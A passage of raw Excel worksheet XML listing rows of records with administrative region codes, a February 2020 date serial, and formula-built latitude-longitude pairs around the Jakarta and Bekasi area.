      </c>
      <c r="H1512" t="s">
        <v>26</v>
      </c>
      <c r="I1512" t="s">
        <v>117</v>
      </c>
      <c r="J1512" t="s">
        <v>925</v>
      </c>
      <c r="L1512" t="s">
        <v>5246</v>
      </c>
      <c r="M1512">
        <v>3174070005</v>
      </c>
      <c r="N1512">
        <v>3174070</v>
      </c>
      <c r="O1512">
        <v>3174</v>
      </c>
      <c r="P1512">
        <v>31</v>
      </c>
      <c r="Q1512" t="s">
        <v>568</v>
      </c>
      <c r="R1512" t="s">
        <v>84</v>
      </c>
      <c r="S1512" t="s">
        <v>32</v>
      </c>
      <c r="T1512" t="s">
        <v>33</v>
      </c>
      <c r="U1512" s="5">
        <v>10673846</v>
      </c>
      <c r="V1512" s="5" t="s">
        <v>15815</v>
      </c>
      <c r="W1512" s="5">
        <v>-613296</v>
      </c>
      <c r="X1512" t="s">
        <v>19192</v>
      </c>
      <c r="Y1512" t="str">
        <f t="shared" si="23"/>
        <v>-6.13296,106.73846</v>
      </c>
    </row>
    <row r="1513" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1513">
        <v>109038</v>
      </c>
      <c r="B1513" s="1">
        <v>43886</v>
      </c>
      <c r="C1513">
        <v>0</v>
      </c>
      <c r="D1513" t="s">
        <v>22</v>
      </c>
      <c r="E1513" t="s">
        <v>23</v>
      </c>
      <c r="F1513" t="s">
        <v>5247</v>
      </c>
      <c r="G1513" t="s">
        <v>5248</v>
      </c>
      <c r="H1513" t="s">
        <v>26</v>
      </c>
      <c r="I1513" t="s">
        <v>5249</v>
      </c>
      <c r="J1513" t="s">
        <v>2627</v>
      </c>
      <c r="L1513" t="s">
        <v>5250</v>
      </c>
      <c r="M1513">
        <v>3275040005</v>
      </c>
      <c r="N1513">
        <v>3275040</v>
      </c>
      <c r="O1513">
        <v>3275</v>
      </c>
      <c r="P1513">
        <v>32</v>
      </c>
      <c r="Q1513" t="s">
        <v>2956</v>
      </c>
      <c r="R1513" t="s">
        <v>100</v>
      </c>
      <c r="S1513" t="s">
        <v>41</v>
      </c>
      <c r="T1513" t="s">
        <v>42</v>
      </c>
      <c r="U1513" s="5">
        <v>10700445</v>
      </c>
      <c r="V1513" s="5" t="s">
        <v>15816</v>
      </c>
      <c r="W1513" s="5">
        <v>-625092</v>
      </c>
      <c r="X1513" t="s">
        <v>19584</v>
      </c>
      <c r="Y1513" t="str">
        <f t="shared" si="23"/>
        <v>-6.25092,107.00445</v>
      </c>
    </row>
    <row r="1514" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1514">
        <v>109039</v>
      </c>
      <c r="B1514" s="1">
        <v>43886</v>
      </c>
      <c r="C1514">
        <v>0</v>
      </c>
      <c r="D1514" t="s">
        <v>22</v>
      </c>
      <c r="E1514" t="s">
        <v>23</v>
      </c>
      <c r="F1514" t="s">
        <v>5251</v>
      </c>
      <c r="G1514" t="s">
        <v>5252</v>
      </c>
      <c r="H1514" t="s">
        <v>26</v>
      </c>
      <c r="I1514" t="s">
        <v>3407</v>
      </c>
      <c r="J1514" t="s">
        <v>1010</v>
      </c>
      <c r="L1514" t="s">
        <v>5253</v>
      </c>
      <c r="M1514">
        <v>3175050002</v>
      </c>
      <c r="N1514">
        <v>3175050</v>
      </c>
      <c r="O1514">
        <v>3175</v>
      </c>
      <c r="P1514">
        <v>31</v>
      </c>
      <c r="Q1514" t="s">
        <v>1012</v>
      </c>
      <c r="R1514" t="s">
        <v>1013</v>
      </c>
      <c r="S1514" t="s">
        <v>547</v>
      </c>
      <c r="T1514" t="s">
        <v>33</v>
      </c>
      <c r="U1514" s="5">
        <v>10690577</v>
      </c>
      <c r="V1514" s="5" t="s">
        <v>15817</v>
      </c>
      <c r="W1514" s="5">
        <v>-616931</v>
      </c>
      <c r="X1514" t="s">
        <v>19585</v>
      </c>
      <c r="Y1514" t="str">
        <f t="shared" si="23"/>
        <v>-6.16931,106.90577</v>
      </c>
    </row>
    <row r="1515" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1515">
        <v>109040</v>
      </c>
      <c r="B1515" s="1">
        <v>43886</v>
      </c>
      <c r="C1515">
        <v>0</v>
      </c>
      <c r="D1515" t="s">
        <v>22</v>
      </c>
      <c r="E1515" t="s">
        <v>23</v>
      </c>
      <c r="F1515" t="s">
        <v>5254</v>
      </c>
      <c r="H1515" t="s">
        <v>26</v>
      </c>
      <c r="I1515" t="s">
        <v>166</v>
      </c>
      <c r="J1515" t="s">
        <v>2194</v>
      </c>
      <c r="L1515" t="s">
        <v>5255</v>
      </c>
      <c r="M1515">
        <v>3175050002</v>
      </c>
      <c r="N1515">
        <v>3175050</v>
      </c>
      <c r="O1515">
        <v>3175</v>
      </c>
      <c r="P1515">
        <v>31</v>
      </c>
      <c r="Q1515" t="s">
        <v>1012</v>
      </c>
      <c r="R1515" t="s">
        <v>1013</v>
      </c>
      <c r="S1515" t="s">
        <v>547</v>
      </c>
      <c r="T1515" t="s">
        <v>33</v>
      </c>
      <c r="U1515" s="5">
        <v>10690305</v>
      </c>
      <c r="V1515" s="5" t="s">
        <v>15818</v>
      </c>
      <c r="W1515" s="5">
        <v>-617375</v>
      </c>
      <c r="X1515" t="s">
        <v>19586</v>
      </c>
      <c r="Y1515" t="str">
        <f t="shared" si="23"/>
        <v>-6.17375,106.90305</v>
      </c>
    </row>
    <row r="1516" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1516">
        <v>109041</v>
      </c>
      <c r="B1516" s="1">
        <v>43886</v>
      </c>
      <c r="C1516">
        <v>0</v>
      </c>
      <c r="D1516" t="s">
        <v>22</v>
      </c>
      <c r="E1516" t="s">
        <v>23</v>
      </c>
      <c r="F1516" t="s">
        <v>5256</v>
      </c>
      <c r="G1516" t="s">
        <v>5257</v>
      </c>
      <c r="H1516" t="s">
        <v>26</v>
      </c>
      <c r="I1516" t="s">
        <v>1359</v>
      </c>
      <c r="J1516" t="s">
        <v>2627</v>
      </c>
      <c r="L1516" t="s">
        <v>5258</v>
      </c>
      <c r="M1516">
        <v>3216100001</v>
      </c>
      <c r="N1516">
        <v>3216100</v>
      </c>
      <c r="O1516">
        <v>3216</v>
      </c>
      <c r="P1516">
        <v>32</v>
      </c>
      <c r="Q1516" t="s">
        <v>2459</v>
      </c>
      <c r="R1516" t="s">
        <v>940</v>
      </c>
      <c r="S1516" t="s">
        <v>41</v>
      </c>
      <c r="T1516" t="s">
        <v>42</v>
      </c>
      <c r="U1516" s="5">
        <v>10697530</v>
      </c>
      <c r="V1516" s="5" t="s">
        <v>15819</v>
      </c>
      <c r="W1516" s="5">
        <v>-615868</v>
      </c>
      <c r="X1516" t="s">
        <v>19587</v>
      </c>
      <c r="Y1516" t="str">
        <f t="shared" si="23"/>
        <v>-6.15868,106.97530</v>
      </c>
    </row>
    <row r="1517" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1517">
        <v>109042</v>
      </c>
      <c r="B1517" s="1">
        <v>43886</v>
      </c>
      <c r="C1517">
        <v>0</v>
      </c>
      <c r="D1517" t="s">
        <v>22</v>
      </c>
      <c r="E1517" t="s">
        <v>23</v>
      </c>
      <c r="F1517" s="3" t="s">
        <v>5259</v>
      </c>
      <c r="G1517" t="s">
        <v>5260</v>
      </c>
      <c r="H1517" t="s">
        <v>26</v>
      </c>
      <c r="I1517" t="s">
        <v>592</v>
      </c>
      <c r="J1517" t="s">
        <v>5261</v>
      </c>
      <c r="L1517" t="s">
        <v>5262</v>
      </c>
      <c r="M1517">
        <v>3173020005</v>
      </c>
      <c r="N1517">
        <v>3173020</v>
      </c>
      <c r="O1517">
        <v>3173</v>
      </c>
      <c r="P1517">
        <v>31</v>
      </c>
      <c r="Q1517" t="s">
        <v>2041</v>
      </c>
      <c r="R1517" t="s">
        <v>179</v>
      </c>
      <c r="S1517" t="s">
        <v>62</v>
      </c>
      <c r="T1517" t="s">
        <v>33</v>
      </c>
      <c r="U1517" s="5">
        <v>10682503</v>
      </c>
      <c r="V1517" s="5" t="s">
        <v>15820</v>
      </c>
      <c r="W1517" s="5">
        <v>-618526</v>
      </c>
      <c r="X1517" t="s">
        <v>19588</v>
      </c>
      <c r="Y1517" t="str">
        <f t="shared" si="23"/>
        <v>-6.18526,106.82503</v>
      </c>
    </row>
    <row r="1518" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1518">
        <v>109043</v>
      </c>
      <c r="B1518" s="1">
        <v>43886</v>
      </c>
      <c r="C1518">
        <v>0</v>
      </c>
      <c r="D1518" t="s">
        <v>22</v>
      </c>
      <c r="E1518" t="s">
        <v>23</v>
      </c>
      <c r="F1518" t="s">
        <v>5263</v>
      </c>
      <c r="G1518" t="s">
        <v>5264</v>
      </c>
      <c r="H1518" t="s">
        <v>26</v>
      </c>
      <c r="I1518" t="s">
        <v>784</v>
      </c>
      <c r="J1518" t="s">
        <v>2221</v>
      </c>
      <c r="L1518" t="s">
        <v>5265</v>
      </c>
      <c r="M1518">
        <v>3172050007</v>
      </c>
      <c r="N1518">
        <v>3172050</v>
      </c>
      <c r="O1518">
        <v>3172</v>
      </c>
      <c r="P1518">
        <v>31</v>
      </c>
      <c r="Q1518" t="s">
        <v>1673</v>
      </c>
      <c r="R1518" t="s">
        <v>358</v>
      </c>
      <c r="S1518" t="s">
        <v>49</v>
      </c>
      <c r="T1518" t="s">
        <v>33</v>
      </c>
      <c r="U1518" s="5">
        <v>10686385</v>
      </c>
      <c r="V1518" s="5" t="s">
        <v>15821</v>
      </c>
      <c r="W1518" s="5">
        <v>-624612</v>
      </c>
      <c r="X1518" t="s">
        <v>19589</v>
      </c>
      <c r="Y1518" t="str">
        <f t="shared" si="23"/>
        <v>-6.24612,106.86385</v>
      </c>
    </row>
    <row r="1519" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1519">
        <v>109044</v>
      </c>
      <c r="B1519" s="1">
        <v>43886</v>
      </c>
      <c r="C1519">
        <v>0</v>
      </c>
      <c r="D1519" t="s">
        <v>22</v>
      </c>
      <c r="E1519" t="s">
        <v>23</v>
      </c>
      <c r="F1519" t="s">
        <v>5266</v>
      </c>
      <c r="H1519" t="s">
        <v>26</v>
      </c>
      <c r="I1519" t="s">
        <v>367</v>
      </c>
      <c r="J1519" t="s">
        <v>2627</v>
      </c>
      <c r="L1519" t="s">
        <v>5267</v>
      </c>
      <c r="M1519">
        <v>3275060005</v>
      </c>
      <c r="N1519">
        <v>3275060</v>
      </c>
      <c r="O1519">
        <v>3275</v>
      </c>
      <c r="P1519">
        <v>32</v>
      </c>
      <c r="Q1519" t="s">
        <v>3526</v>
      </c>
      <c r="R1519" t="s">
        <v>114</v>
      </c>
      <c r="S1519" t="s">
        <v>41</v>
      </c>
      <c r="T1519" t="s">
        <v>42</v>
      </c>
      <c r="U1519" s="5">
        <v>10695929</v>
      </c>
      <c r="V1519" s="5" t="s">
        <v>15822</v>
      </c>
      <c r="W1519" s="5">
        <v>-621588</v>
      </c>
      <c r="X1519" t="s">
        <v>19590</v>
      </c>
      <c r="Y1519" t="str">
        <f t="shared" si="23"/>
        <v>-6.21588,106.95929</v>
      </c>
    </row>
    <row r="1520" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1520">
        <v>109045</v>
      </c>
      <c r="B1520" s="1">
        <v>43886</v>
      </c>
      <c r="C1520">
        <v>0</v>
      </c>
      <c r="D1520" t="s">
        <v>22</v>
      </c>
      <c r="E1520" t="s">
        <v>23</v>
      </c>
      <c r="F1520" t="s">
        <v>5268</v>
      </c>
      <c r="G1520" t="s">
        <v>5269</v>
      </c>
      <c r="H1520" t="s">
        <v>26</v>
      </c>
      <c r="I1520" t="s">
        <v>5270</v>
      </c>
      <c r="J1520" t="s">
        <v>2785</v>
      </c>
      <c r="L1520" t="s">
        <v>5271</v>
      </c>
      <c r="M1520">
        <v>3174040005</v>
      </c>
      <c r="N1520">
        <v>3174040</v>
      </c>
      <c r="O1520">
        <v>3174</v>
      </c>
      <c r="P1520">
        <v>31</v>
      </c>
      <c r="Q1520" t="s">
        <v>376</v>
      </c>
      <c r="R1520" t="s">
        <v>377</v>
      </c>
      <c r="S1520" t="s">
        <v>32</v>
      </c>
      <c r="T1520" t="s">
        <v>33</v>
      </c>
      <c r="U1520" s="5">
        <v>10679069</v>
      </c>
      <c r="V1520" s="5" t="s">
        <v>15823</v>
      </c>
      <c r="W1520" s="5">
        <v>-615935</v>
      </c>
      <c r="X1520" t="s">
        <v>19591</v>
      </c>
      <c r="Y1520" t="str">
        <f t="shared" si="23"/>
        <v>-6.15935,106.79069</v>
      </c>
    </row>
    <row r="1521" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1521">
        <v>109046</v>
      </c>
      <c r="B1521" s="1">
        <v>43886</v>
      </c>
      <c r="C1521">
        <v>0</v>
      </c>
      <c r="D1521" t="s">
        <v>22</v>
      </c>
      <c r="E1521" t="s">
        <v>23</v>
      </c>
      <c r="F1521" t="s">
        <v>5272</v>
      </c>
      <c r="G1521" t="s">
        <v>5273</v>
      </c>
      <c r="H1521" t="s">
        <v>26</v>
      </c>
      <c r="I1521" t="s">
        <v>166</v>
      </c>
      <c r="J1521" t="s">
        <v>2573</v>
      </c>
      <c r="L1521" t="s">
        <v>5274</v>
      </c>
      <c r="M1521">
        <v>3175050003</v>
      </c>
      <c r="N1521">
        <v>3175050</v>
      </c>
      <c r="O1521">
        <v>3175</v>
      </c>
      <c r="P1521">
        <v>31</v>
      </c>
      <c r="Q1521" t="s">
        <v>1740</v>
      </c>
      <c r="R1521" t="s">
        <v>1013</v>
      </c>
      <c r="S1521" t="s">
        <v>547</v>
      </c>
      <c r="T1521" t="s">
        <v>33</v>
      </c>
      <c r="U1521" s="5">
        <v>10692126</v>
      </c>
      <c r="V1521" s="5" t="s">
        <v>15824</v>
      </c>
      <c r="W1521" s="5">
        <v>-616321</v>
      </c>
      <c r="X1521" t="s">
        <v>19592</v>
      </c>
      <c r="Y1521" t="str">
        <f t="shared" si="23"/>
        <v>-6.16321,106.92126</v>
      </c>
    </row>
    <row r="1522" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1522">
        <v>109047</v>
      </c>
      <c r="B1522" s="1">
        <v>43886</v>
      </c>
      <c r="C1522">
        <v>0</v>
      </c>
      <c r="D1522" t="s">
        <v>22</v>
      </c>
      <c r="E1522" t="s">
        <v>23</v>
      </c>
      <c r="F1522" t="s">
        <v>5275</v>
      </c>
      <c r="G1522" t="s">
        <v>5276</v>
      </c>
      <c r="H1522" t="s">
        <v>26</v>
      </c>
      <c r="I1522" t="s">
        <v>857</v>
      </c>
      <c r="J1522" t="s">
        <v>2627</v>
      </c>
      <c r="L1522" t="s">
        <v>5277</v>
      </c>
      <c r="M1522">
        <v>3275010010</v>
      </c>
      <c r="N1522">
        <v>3275010</v>
      </c>
      <c r="O1522">
        <v>3275</v>
      </c>
      <c r="P1522">
        <v>32</v>
      </c>
      <c r="Q1522" t="s">
        <v>286</v>
      </c>
      <c r="R1522" t="s">
        <v>287</v>
      </c>
      <c r="S1522" t="s">
        <v>41</v>
      </c>
      <c r="T1522" t="s">
        <v>42</v>
      </c>
      <c r="U1522" s="5">
        <v>10695033</v>
      </c>
      <c r="V1522" s="5" t="s">
        <v>15825</v>
      </c>
      <c r="W1522" s="5">
        <v>-626179</v>
      </c>
      <c r="X1522" t="s">
        <v>19593</v>
      </c>
      <c r="Y1522" t="str">
        <f t="shared" si="23"/>
        <v>-6.26179,106.95033</v>
      </c>
    </row>
    <row r="1523" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1523">
        <v>109048</v>
      </c>
      <c r="B1523" s="1">
        <v>43886</v>
      </c>
      <c r="C1523">
        <v>0</v>
      </c>
      <c r="D1523" t="s">
        <v>22</v>
      </c>
      <c r="E1523" t="s">
        <v>23</v>
      </c>
      <c r="F1523" t="s">
        <v>5278</v>
      </c>
      <c r="G1523" t="s">
        <v>5279</v>
      </c>
      <c r="H1523" t="s">
        <v>26</v>
      </c>
      <c r="I1523" t="s">
        <v>666</v>
      </c>
      <c r="J1523" t="s">
        <v>5280</v>
      </c>
      <c r="L1523" t="s">
        <v>5281</v>
      </c>
      <c r="M1523">
        <v>3171060004</v>
      </c>
      <c r="N1523">
        <v>3171060</v>
      </c>
      <c r="O1523">
        <v>3171</v>
      </c>
      <c r="P1523">
        <v>31</v>
      </c>
      <c r="Q1523" t="s">
        <v>5027</v>
      </c>
      <c r="R1523" t="s">
        <v>1236</v>
      </c>
      <c r="S1523" t="s">
        <v>108</v>
      </c>
      <c r="T1523" t="s">
        <v>33</v>
      </c>
      <c r="U1523" s="5">
        <v>10681440</v>
      </c>
      <c r="V1523" s="5" t="s">
        <v>15826</v>
      </c>
      <c r="W1523" s="5">
        <v>-624183</v>
      </c>
      <c r="X1523" t="s">
        <v>19594</v>
      </c>
      <c r="Y1523" t="str">
        <f t="shared" si="23"/>
        <v>-6.24183,106.81440</v>
      </c>
    </row>
    <row r="1524" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1524">
        <v>109049</v>
      </c>
      <c r="B1524" s="1">
        <v>43886</v>
      </c>
      <c r="C1524">
        <v>0</v>
      </c>
      <c r="D1524" t="s">
        <v>22</v>
      </c>
      <c r="E1524" t="s">
        <v>23</v>
      </c>
      <c r="F1524" t="s">
        <v>5282</v>
      </c>
      <c r="H1524" t="s">
        <v>26</v>
      </c>
      <c r="I1524" t="s">
        <v>5283</v>
      </c>
      <c r="J1524" t="s">
        <v>2868</v>
      </c>
      <c r="L1524" t="s">
        <v>5284</v>
      </c>
      <c r="M1524">
        <v>3172080001</v>
      </c>
      <c r="N1524">
        <v>3172080</v>
      </c>
      <c r="O1524">
        <v>3172</v>
      </c>
      <c r="P1524">
        <v>31</v>
      </c>
      <c r="Q1524" t="s">
        <v>48</v>
      </c>
      <c r="R1524" t="s">
        <v>141</v>
      </c>
      <c r="S1524" t="s">
        <v>49</v>
      </c>
      <c r="T1524" t="s">
        <v>33</v>
      </c>
      <c r="U1524" s="5">
        <v>10690428</v>
      </c>
      <c r="V1524" s="5" t="s">
        <v>15827</v>
      </c>
      <c r="W1524" s="5">
        <v>-620779</v>
      </c>
      <c r="X1524" t="s">
        <v>19595</v>
      </c>
      <c r="Y1524" t="str">
        <f t="shared" si="23"/>
        <v>-6.20779,106.90428</v>
      </c>
    </row>
    <row r="1525" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1525">
        <v>109050</v>
      </c>
      <c r="B1525" s="1">
        <v>43886</v>
      </c>
      <c r="C1525">
        <v>0</v>
      </c>
      <c r="D1525" t="s">
        <v>22</v>
      </c>
      <c r="E1525" t="s">
        <v>23</v>
      </c>
      <c r="F1525" t="s">
        <v>5285</v>
      </c>
      <c r="G1525" t="s">
        <v>5286</v>
      </c>
      <c r="H1525" t="s">
        <v>26</v>
      </c>
      <c r="I1525" t="s">
        <v>886</v>
      </c>
      <c r="J1525" t="s">
        <v>2627</v>
      </c>
      <c r="L1525" t="s">
        <v>5287</v>
      </c>
      <c r="M1525">
        <v>3275050002</v>
      </c>
      <c r="N1525">
        <v>3275050</v>
      </c>
      <c r="O1525">
        <v>3275</v>
      </c>
      <c r="P1525">
        <v>32</v>
      </c>
      <c r="Q1525" t="s">
        <v>2245</v>
      </c>
      <c r="R1525" t="s">
        <v>955</v>
      </c>
      <c r="S1525" t="s">
        <v>41</v>
      </c>
      <c r="T1525" t="s">
        <v>42</v>
      </c>
      <c r="U1525" s="5">
        <v>10697063</v>
      </c>
      <c r="V1525" s="5" t="s">
        <v>15828</v>
      </c>
      <c r="W1525" s="5">
        <v>-626831</v>
      </c>
      <c r="X1525" t="s">
        <v>19596</v>
      </c>
      <c r="Y1525" t="str">
        <f t="shared" si="23"/>
        <v>-6.26831,106.97063</v>
      </c>
    </row>
    <row r="1526" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1526">
        <v>109051</v>
      </c>
      <c r="B1526" s="1">
        <v>43886</v>
      </c>
      <c r="C1526">
        <v>0</v>
      </c>
      <c r="D1526" t="s">
        <v>22</v>
      </c>
      <c r="E1526" t="s">
        <v>23</v>
      </c>
      <c r="F1526" t="s">
        <v>5288</v>
      </c>
      <c r="G1526" t="s">
        <v>5289</v>
      </c>
      <c r="H1526" t="s">
        <v>26</v>
      </c>
      <c r="I1526" t="s">
        <v>585</v>
      </c>
      <c r="J1526" t="s">
        <v>5290</v>
      </c>
      <c r="L1526" t="s">
        <v>3266</v>
      </c>
      <c r="M1526">
        <v>3174060002</v>
      </c>
      <c r="N1526">
        <v>3174060</v>
      </c>
      <c r="O1526">
        <v>3174</v>
      </c>
      <c r="P1526">
        <v>31</v>
      </c>
      <c r="Q1526" t="s">
        <v>1761</v>
      </c>
      <c r="R1526" t="s">
        <v>1762</v>
      </c>
      <c r="S1526" t="s">
        <v>32</v>
      </c>
      <c r="T1526" t="s">
        <v>33</v>
      </c>
      <c r="U1526" s="5">
        <v>10681755</v>
      </c>
      <c r="V1526" s="5" t="s">
        <v>15829</v>
      </c>
      <c r="W1526" s="5">
        <v>-615233</v>
      </c>
      <c r="X1526" t="s">
        <v>19597</v>
      </c>
      <c r="Y1526" t="str">
        <f t="shared" si="23"/>
        <v>-6.15233,106.81755</v>
      </c>
    </row>
    <row r="1527" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1527">
        <v>109052</v>
      </c>
      <c r="B1527" s="1">
        <v>43886</v>
      </c>
      <c r="C1527">
        <v>0</v>
      </c>
      <c r="D1527" t="s">
        <v>22</v>
      </c>
      <c r="E1527" t="s">
        <v>23</v>
      </c>
      <c r="F1527" t="s">
        <v>5291</v>
      </c>
      <c r="G1527" t="s">
        <v>5292</v>
      </c>
      <c r="H1527" t="s">
        <v>26</v>
      </c>
      <c r="I1527" t="s">
        <v>3577</v>
      </c>
      <c r="J1527" t="s">
        <v>5293</v>
      </c>
      <c r="L1527" t="s">
        <v>5294</v>
      </c>
      <c r="M1527">
        <v>3171030003</v>
      </c>
      <c r="N1527">
        <v>3171030</v>
      </c>
      <c r="O1527">
        <v>3171</v>
      </c>
      <c r="P1527">
        <v>31</v>
      </c>
      <c r="Q1527" t="s">
        <v>370</v>
      </c>
      <c r="R1527" t="s">
        <v>364</v>
      </c>
      <c r="S1527" t="s">
        <v>108</v>
      </c>
      <c r="T1527" t="s">
        <v>33</v>
      </c>
      <c r="U1527" s="5">
        <v>10680976</v>
      </c>
      <c r="V1527" s="5" t="s">
        <v>15830</v>
      </c>
      <c r="W1527" s="5">
        <v>-627829</v>
      </c>
      <c r="X1527" t="s">
        <v>19598</v>
      </c>
      <c r="Y1527" t="str">
        <f t="shared" si="23"/>
        <v>-6.27829,106.80976</v>
      </c>
    </row>
    <row r="1528" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1528">
        <v>109053</v>
      </c>
      <c r="B1528" s="1">
        <v>43886</v>
      </c>
      <c r="C1528">
        <v>0</v>
      </c>
      <c r="D1528" t="s">
        <v>22</v>
      </c>
      <c r="E1528" t="s">
        <v>23</v>
      </c>
      <c r="F1528" t="s">
        <v>5295</v>
      </c>
      <c r="G1528" t="s">
        <v>5296</v>
      </c>
      <c r="H1528" t="s">
        <v>26</v>
      </c>
      <c r="I1528" t="s">
        <v>80</v>
      </c>
      <c r="J1528" t="s">
        <v>5297</v>
      </c>
      <c r="L1528" t="s">
        <v>5298</v>
      </c>
      <c r="M1528">
        <v>3172080002</v>
      </c>
      <c r="N1528">
        <v>3172080</v>
      </c>
      <c r="O1528">
        <v>3172</v>
      </c>
      <c r="P1528">
        <v>31</v>
      </c>
      <c r="Q1528" t="s">
        <v>2804</v>
      </c>
      <c r="R1528" t="s">
        <v>141</v>
      </c>
      <c r="S1528" t="s">
        <v>49</v>
      </c>
      <c r="T1528" t="s">
        <v>33</v>
      </c>
      <c r="U1528" s="5">
        <v>10693348</v>
      </c>
      <c r="V1528" s="5" t="s">
        <v>15831</v>
      </c>
      <c r="W1528" s="5">
        <v>-621137</v>
      </c>
      <c r="X1528" t="s">
        <v>19599</v>
      </c>
      <c r="Y1528" t="str">
        <f t="shared" si="23"/>
        <v>-6.21137,106.93348</v>
      </c>
    </row>
    <row r="1529" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1529">
        <v>109054</v>
      </c>
      <c r="B1529" s="1">
        <v>43886</v>
      </c>
      <c r="C1529">
        <v>0</v>
      </c>
      <c r="D1529" t="s">
        <v>22</v>
      </c>
      <c r="E1529" t="s">
        <v>23</v>
      </c>
      <c r="F1529" t="s">
        <v>5299</v>
      </c>
      <c r="G1529" t="s">
        <v>5300</v>
      </c>
      <c r="H1529" t="s">
        <v>26</v>
      </c>
      <c r="I1529" t="s">
        <v>1909</v>
      </c>
      <c r="J1529" t="s">
        <v>2489</v>
      </c>
      <c r="L1529" t="s">
        <v>5301</v>
      </c>
      <c r="M1529">
        <v>3175030002</v>
      </c>
      <c r="N1529">
        <v>3175030</v>
      </c>
      <c r="O1529">
        <v>3175</v>
      </c>
      <c r="P1529">
        <v>31</v>
      </c>
      <c r="Q1529" t="s">
        <v>1592</v>
      </c>
      <c r="R1529" t="s">
        <v>1563</v>
      </c>
      <c r="S1529" t="s">
        <v>547</v>
      </c>
      <c r="T1529" t="s">
        <v>33</v>
      </c>
      <c r="U1529" s="5">
        <v>10688158</v>
      </c>
      <c r="V1529" s="5" t="s">
        <v>15832</v>
      </c>
      <c r="W1529" s="5">
        <v>-616217</v>
      </c>
      <c r="X1529" t="s">
        <v>19600</v>
      </c>
      <c r="Y1529" t="str">
        <f t="shared" si="23"/>
        <v>-6.16217,106.88158</v>
      </c>
    </row>
    <row r="1530" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1530">
        <v>109055</v>
      </c>
      <c r="B1530" s="1">
        <v>43886</v>
      </c>
      <c r="C1530">
        <v>0</v>
      </c>
      <c r="D1530" t="s">
        <v>22</v>
      </c>
      <c r="E1530" t="s">
        <v>23</v>
      </c>
      <c r="F1530" t="s">
        <v>5302</v>
      </c>
      <c r="G1530" t="s">
        <v>5303</v>
      </c>
      <c r="H1530" t="s">
        <v>26</v>
      </c>
      <c r="I1530" t="s">
        <v>181</v>
      </c>
      <c r="J1530" t="s">
        <v>5304</v>
      </c>
      <c r="L1530" t="s">
        <v>5305</v>
      </c>
      <c r="M1530">
        <v>3171020001</v>
      </c>
      <c r="N1530">
        <v>3171020</v>
      </c>
      <c r="O1530">
        <v>3171</v>
      </c>
      <c r="P1530">
        <v>31</v>
      </c>
      <c r="Q1530" t="s">
        <v>5306</v>
      </c>
      <c r="R1530" t="s">
        <v>484</v>
      </c>
      <c r="S1530" t="s">
        <v>108</v>
      </c>
      <c r="T1530" t="s">
        <v>33</v>
      </c>
      <c r="U1530" s="5">
        <v>10681439</v>
      </c>
      <c r="V1530" s="5" t="s">
        <v>15833</v>
      </c>
      <c r="W1530" s="5">
        <v>-627682</v>
      </c>
      <c r="X1530" t="s">
        <v>19601</v>
      </c>
      <c r="Y1530" t="str">
        <f t="shared" si="23"/>
        <v>-6.27682,106.81439</v>
      </c>
    </row>
    <row r="1531" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1531">
        <v>109056</v>
      </c>
      <c r="B1531" s="1">
        <v>43886</v>
      </c>
      <c r="C1531">
        <v>0</v>
      </c>
      <c r="D1531" t="s">
        <v>22</v>
      </c>
      <c r="E1531" t="s">
        <v>23</v>
      </c>
      <c r="F1531" t="s">
        <v>5307</v>
      </c>
      <c r="G1531" t="s">
        <v>5308</v>
      </c>
      <c r="H1531" t="s">
        <v>26</v>
      </c>
      <c r="I1531" t="s">
        <v>5309</v>
      </c>
      <c r="J1531" t="s">
        <v>2627</v>
      </c>
      <c r="L1531" t="s">
        <v>5310</v>
      </c>
      <c r="M1531">
        <v>3275040006</v>
      </c>
      <c r="N1531">
        <v>3275040</v>
      </c>
      <c r="O1531">
        <v>3275</v>
      </c>
      <c r="P1531">
        <v>32</v>
      </c>
      <c r="Q1531" t="s">
        <v>2185</v>
      </c>
      <c r="R1531" t="s">
        <v>100</v>
      </c>
      <c r="S1531" t="s">
        <v>41</v>
      </c>
      <c r="T1531" t="s">
        <v>42</v>
      </c>
      <c r="U1531" s="5">
        <v>10701395</v>
      </c>
      <c r="V1531" s="5" t="s">
        <v>15834</v>
      </c>
      <c r="W1531" s="5">
        <v>-623326</v>
      </c>
      <c r="X1531" t="s">
        <v>19602</v>
      </c>
      <c r="Y1531" t="str">
        <f t="shared" si="23"/>
        <v>-6.23326,107.01395</v>
      </c>
    </row>
    <row r="1532" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1532">
        <v>109057</v>
      </c>
      <c r="B1532" s="1">
        <v>43886</v>
      </c>
      <c r="C1532">
        <v>0</v>
      </c>
      <c r="D1532" t="s">
        <v>22</v>
      </c>
      <c r="E1532" t="s">
        <v>23</v>
      </c>
      <c r="F1532" t="s">
        <v>5311</v>
      </c>
      <c r="G1532" t="s">
        <v>5312</v>
      </c>
      <c r="H1532" t="s">
        <v>26</v>
      </c>
      <c r="I1532" t="s">
        <v>1538</v>
      </c>
      <c r="J1532" t="s">
        <v>5313</v>
      </c>
      <c r="L1532" t="s">
        <v>5314</v>
      </c>
      <c r="M1532">
        <v>3175030007</v>
      </c>
      <c r="N1532">
        <v>3175030</v>
      </c>
      <c r="O1532">
        <v>3175</v>
      </c>
      <c r="P1532">
        <v>31</v>
      </c>
      <c r="Q1532" t="s">
        <v>1562</v>
      </c>
      <c r="R1532" t="s">
        <v>1563</v>
      </c>
      <c r="S1532" t="s">
        <v>547</v>
      </c>
      <c r="T1532" t="s">
        <v>33</v>
      </c>
      <c r="U1532" s="5">
        <v>10686829</v>
      </c>
      <c r="V1532" s="5" t="s">
        <v>15835</v>
      </c>
      <c r="W1532" s="5">
